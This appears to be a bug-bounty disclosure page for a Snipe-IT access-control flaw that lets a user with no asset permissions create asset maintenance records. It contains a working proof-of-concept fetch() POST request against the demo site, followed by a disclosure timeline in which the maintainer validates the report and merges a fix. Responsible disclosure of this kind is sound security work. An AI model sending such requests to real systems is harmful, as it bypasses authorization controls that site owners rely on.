Improper Privilege Management in snipe/snipe-it

Valid

Reported on

Feb 10th 2022


Description

Unprivilege user can create maintainance for asset

Proof of Concept

1. Create regular user and set DENY to all permissions in asset models.
2. Login as the user and sent bellow request to create maintainance for asset

await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1"
    },
    "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
    "body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin",
    "method": "POST",
    "mode": "cors"
});

Impact

unprivileged user can create maintainance for any asset

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 4 months ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 4 months ago
We have sent a follow up to the snipe/snipe-it team. We will try again in 7 days. 3 months ago
snipe
3 months ago

Maintainer


"Create regular user and set DENY to all permissions in asset models."

Assets or asset models?

snipe validated this vulnerability 3 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe confirmed that a fix has been merged on 321be4 3 months ago
snipe has been awarded the fix bounty
to join this conversation